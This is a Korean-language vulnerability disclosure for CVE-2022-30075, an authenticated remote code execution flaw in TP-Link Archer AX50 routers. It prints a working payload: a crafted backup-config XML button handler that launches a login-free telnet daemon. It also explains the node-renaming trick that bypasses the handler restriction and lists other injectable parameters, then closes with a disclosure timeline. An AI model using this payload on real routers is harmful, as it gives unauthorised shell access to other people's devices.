
Tp-Link Archer AX50 인증된 RCE (CVE-2022-30075)
Tp-Link 라우터에서의 인증된 원격 코드 실행
Tp-Link 라우터에 백업 및 복원 기능이 있고 펌웨어가 2022년 6월보다 오래된 경우 취약할 가능성이 있습니다.
Tp-Link Archer AX50, 다른 Tp-Link 라우터는 다른 형식의 백업을 사용할 수 있으며 익스플로잇을 수정해야 할 수 있습니다.
라우터에서 텔넷 데몬을 시작하기 위한 익스플로잇 사용

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler 매개변수 수정을 차단하는 제한이 있지만, 상위 XML 노드의 이름을 변경하면 쉽게 우회할 수 있습니다(예: name="exploit").system.button.handler 매개변수 변경뿐만 아니라 ddns.service.ip_script, firewall.include.path, uhttpd.main 등을 사용해서도 가능합니다.../usr/sbin/telnetd -l /bin/login.sh을 실행합니다.telnet 192.168.1.115.03.2022 - 취약점 식별 15.03.2022 - Tp-Link 지원팀에 연락 16.03.2022 - Tp-Link로부터 응답 수신 02.05.2022 - CVE 할당 27.05.2022 - Tp-Link가 취약점이 수정된 펌웨어 출시 07.06.2022 - 기술 세부 정보 공개